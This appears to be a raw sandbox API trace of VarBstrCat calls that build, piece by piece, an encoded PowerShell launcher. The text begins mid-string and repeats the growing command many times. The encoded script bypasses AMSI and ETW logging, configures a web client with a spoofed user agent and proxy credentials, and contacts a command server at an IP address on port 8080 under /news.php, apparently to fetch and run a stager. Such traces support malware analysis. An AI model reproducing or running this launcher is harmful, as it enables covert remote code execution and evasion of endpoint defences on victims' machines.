3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMA", bstrRight="BWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.835] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9", bstrRight="AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsAC", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.835] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsAC", bstrRight="QASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.836] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsA", bstrRight="MAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWw", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.836] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWw", bstrRight="AkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABd", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.836] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG